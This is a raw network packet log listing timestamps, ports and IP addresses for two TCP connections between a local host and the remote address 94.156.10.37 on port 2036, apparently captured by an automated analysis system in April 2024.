Apr 14, 2024 08:45:28.164519072 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.164551020 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.164556026 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.164577007 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.164586067 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.164623976 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.164654970 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.164724112 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.390893936 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.390960932 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.391040087 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.391040087 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.391190052 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.391381979 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.391489983 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:28.619458914 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.619522095 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.619983912 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620043039 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620078087 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620111942 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620146990 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620178938 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620212078 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620268106 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620300055 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620332956 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620363951 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620395899 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620426893 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620459080 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.620490074 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.695993900 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:28.747790098 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:29.685507059 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:29.912026882 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:29.912261963 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:30.138453007 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:30.215517998 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:30.215579033 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:30.215619087 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:30.215713978 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:30.215796947 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:30.216114998 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:30.263828039 CEST	49738	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:30.442351103 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:30.490070105 CEST	2036	49738	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:35.201277971 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:35.427700996 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:35.427843094 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:35.427993059 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:35.654047012 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:35.661847115 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:35.661914110 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:35.661969900 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:35.670061111 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:35.902146101 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:35.902340889 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:36.168636084 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:36.458365917 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:36.462143898 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:36.688314915 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:36.688395023 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:36.914664030 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:36.995495081 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.005673885 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.231971025 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.232040882 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.458045006 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.538681030 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541126013 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541274071 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.541445971 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541488886 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541524887 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541559935 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541596889 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541600943 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.541636944 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541676044 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541712046 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.541733027 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.541759968 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767302036 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767366886 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767405987 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767441988 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767452955 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767483950 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767489910 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767524958 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767563105 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767569065 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767604113 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767642021 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767658949 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767688990 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767734051 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767734051 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767772913 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767808914 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767810106 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767847061 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767883062 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767900944 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767920017 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767956972 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.767960072 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.767995119 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.768032074 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.768064022 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.768069983 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.768110037 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994083881 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994180918 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994223118 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994241953 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994262934 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994302988 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994343042 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994350910 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994381905 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994421005 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994425058 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994460106 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994463921 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994498968 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994535923 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994573116 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994580984 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994611979 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994617939 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994652987 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994693041 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994731903 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994744062 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994771004 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994776964 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994811058 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994848013 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994884968 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994891882 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994924068 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.994925976 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.994963884 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995002985 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995026112 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995040894 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995079041 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995111942 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995116949 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995157003 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995193958 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995203018 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995233059 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995239019 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995270967 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995311975 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995358944 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995367050 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995398998 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995402098 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995435953 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995472908 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995481968 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995510101 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995547056 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995579004 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995590925 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995618105 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995625019 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:37.995657921 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:37.995712042 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.221596956 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221667051 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221705914 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221745014 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221765041 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.221785069 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221796989 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.221824884 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221863985 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221901894 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221909046 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.221945047 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.221945047 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.221982956 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222044945 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222083092 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222096920 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222125053 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222132921 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222167969 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222207069 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222229958 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222250938 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222289085 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222325087 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222337008 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222363949 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222385883 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222404003 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222441912 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222476959 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222486973 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222516060 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222520113 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222558022 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222595930 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222631931 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222642899 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222671986 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222678900 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222712994 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222749949 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222788095 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222800016 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222827911 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222832918 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222871065 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222908020 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222946882 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222954035 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.222984076 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.222991943 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223022938 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223059893 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223095894 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223104954 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223135948 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223140955 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223175049 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223212004 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223251104 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223262072 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223289013 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223294973 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223329067 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223367929 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223403931 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223411083 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223442078 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223448038 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223480940 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223517895 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223556042 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223572016 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223593950 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223603010 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223628998 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223664999 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223701000 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223714113 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223740101 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223746061 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223776102 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223814011 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223853111 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223860025 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223891020 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223900080 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.223927021 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.223963976 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224000931 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224011898 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224040985 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224045038 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224075079 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224112034 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224155903 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224164963 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224195957 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224200010 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224257946 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224296093 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224332094 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224343061 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224370003 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224375963 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224402905 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224440098 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224476099 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224482059 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224514008 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224520922 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224549055 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224585056 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224623919 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224633932 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224663019 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.224668980 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.224699020 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.226150036 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.450828075 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.450896025 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.450933933 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.450962067 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.450977087 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451019049 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451029062 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451060057 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451102018 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451143026 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451157093 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451188087 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451191902 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451227903 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451265097 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451306105 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451314926 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451344967 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451351881 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451385975 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451430082 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451467037 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451473951 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451505899 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451512098 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451545000 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451581955 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451620102 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451627970 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451658010 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451663017 CEST	49739	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:38.451694965 CEST	2036	49739	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:38.451733112 CEST	2036	49739	94.156.10.37	192.168.2.4
